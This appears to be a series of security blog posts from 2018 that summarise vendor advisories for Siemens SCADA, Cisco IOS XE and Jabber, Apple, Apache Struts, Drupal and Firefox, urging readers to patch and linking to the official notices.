We heard in frequent that threat actors will be engaged APT attack to hostile country. The more percentage of cyber attack to the important public facilities most likely is the nuclear power facilities and power generator. As we know, a harden procedure has been built by nuclear power facilitates company. In order to avoid the unforeseen cyber incident happens, internet access function is prohibited in that area. However working with SCADA technologies market coverage not limit to nuclear power facilities. The oil refinery industry, natural gas and water supply facilities are relies on SCADA system. Today, a security alert is going to awake oil refinery, gas and water supply industries. Since a announcement by SCADA hardware manufacture Siemens, they inform that their product encountered vulnerability. The manufacture provides the workaround. However, the workaround only suggest to setup a preventive control.  To be honest, may be there are more spaces to do the remediation! Should you aware of this vulnerability. please refer below vendor announcement for reference.

https://cert-portal.siemens.com/productcert/pdf/ssa-110922.pdf

Perhaps a medium vulnerability found on IT product not a shock. However the medium vulnerability co-exists with known critical vulnerabilities created multiple vulnerabilities are unable to foreseen what is the level of damage. Cisco IOS XE fundamental design integrate to open system. The severity of vulnerability CVE-2018-0196 is medium level. End user is allow to disable the http services to avoid the vulnerability. But the default state of the HTTP Server feature is version-dependent. A significant signal alert Cisco customer that corrective control is not enough. A efficient way is enhance your preventive and detective control. That is the implementation of managed security services. The critical vulnerabilities was posted last week. But the vulnerability of CVE-2018-0196 confirmed and therefore it summarized as below:

CVE-2018-0196 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-wfw

CVE-2018-0151

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos

CVE-2018-0171

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

I spend a lot of time to study security update by Apple this week. It looks that core foundation vulnerability bring to my attention. As we know Objective-C is a general-purpose, object-oriented programming language used by Apple for the OS X and iOS operating systems. Retrospectively, vendor has urge developer that a good practices will be prevented memory-related problem. I am concerning about the race condition vulnerability found this time. There are two main kinds of problem that result from incorrect memory management. Freeing or overwriting data that is still in use. Not freeing data that is no longer in use causes memory leaks. This is the way to causes the vulnerability (race condition) happens.

Since there are plenty of vulnerabilities address this time. For more details, please refer to official url for reference.

About the security content of iOS 11.3

https://support.apple.com/en-us/HT208693

About the security content of Xcode 9.3

https://support.apple.com/en-us/HT208699

Vulnerability when will it stop, this is our holiday! The Apache Software Foundation has released a security update to address a vulnerability in Struts 2. The problem was that a DoS attack is possible when using XStream handler with the Struts REST plugin. As far as I know, Cisco integrate Struts 2 in their product design. Since without status update by Cisco in regards to this vulnerabilities. So, stay tuned!

You can find the official technical details below:

https://cwiki.apache.org/confluence/display/WW/S2-056

This vulnerability so call Easter holiday vulnerability.

Drupal core installation can serve as a simple Web site, a single- or multi-user blog, an Internet forum, or a community Web site providing for user-generated content. The risk calculator shown that it is highly critical according NIST Common Misuse Scoring System (NISTIR 7864). Two critical factors told us the following:

• All data can be modified or deleted
• All non-public data is accessible

It is indeed nightmare! Drupal user must do the patching immediately. Otherwise there is a new round of data leakage incident will be happened soon!

Official announcement: Drupal core – Highly critical – Remote Code Execution

https://www.drupal.org/sa-core-2018-002

Hi Folks, homeland security urge computer users stay alert of web browser (FireFox) vulnerability. The design flaw could let the attacker execute a denial-of-service condition.  I review the vulnerability details. It state the following. A use-after-free vulnerability can occur in the compositor during certain graphics operations when a raw pointer is used instead of a reference counted one. This results in a potentially exploitable crash. But I have different imagination of this flaw. In short, please refer below diagram for reference.

To be or not to be? But it is better to conduct the security update now. For more details, please refer below url for reference.

https://www.mozilla.org/en-US/security/advisories/mfsa2018-10/

IP telephony integration to IT infrastructure is a main trend in last decade.  Following the security best practice, the IP telephony system should be isolated and far away from data network. However there are end user function requirement which causes unified communications manager integrate with Active directory services. A useful function will be activated after active directory integration. For instance a track record will be shown individual communication history. Meanwhile it will enhance the monitor and control process (SOX 403 monitoring and control). Perhaps a pin does not have two points and therefore it is hard to avoid vulnerability happen. For example, Cisco IP telephone working with Microsoft TSAPI last decade. But most recently Android and iPhone growth rapidly. IP telephony vendor will be make use of open source unintentionally. An XMPP client is any software or application that enables you to connect to an XMPP for instant messaging with other people over the Internet. Cisco official announce that there is a vulnerability found on Jabber client from November 2017 (CVE-2017-12361). 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171129-jabber2

The jabber design flaw has been identified this month. The issue is that vulnerability might allow local users to gain privileges by leveraging access to this account and then waiting for root to execute one of these programs. In the meantime, we do not receive announcement release by Cisco (Jabber Security Vulnerabilities CVE-2017-18225). But we keep our eyes open, see whether does it affect Cisco jabber iPhone and Android client product?

CVE-2017-18225 vulnerability details shown as below:

https://security.gentoo.org/glsa/201803-07